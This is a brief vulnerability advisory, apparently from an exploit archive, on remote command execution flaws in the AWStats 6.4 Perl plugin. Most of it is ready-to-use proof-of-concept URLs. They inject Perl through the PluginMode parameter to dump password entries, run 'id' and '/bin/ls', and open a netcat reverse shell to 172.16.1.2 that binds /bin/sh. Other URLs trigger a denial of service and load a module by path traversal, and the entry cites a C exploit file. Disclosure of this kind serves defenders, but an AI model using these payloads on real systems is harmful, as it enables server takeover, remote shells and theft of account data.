AWStats Plugin Multiple Remote Command Execution Vulnerabilities

AWStats Plugin Multiple Remote Command Execution Vulnerabilities

The following proof of concepts have been provided:

To execute arbitrary commands:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+system('id')+;
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;

To trigger a denial of service condition:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep

To load the 'blib' Perl module:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib

The following proof of concept was provided by <newbug@chroot.org>:
http://www.example.com/awstats/awstats.pl?pluginmode=:system http://xxx/awstats/awstats.pl?pluginmode=:system (?/bin/ls?);

The following proof of concept has been made available:

/data/vulnerabilities/exploits/awstatsCommandExecutionPoC.c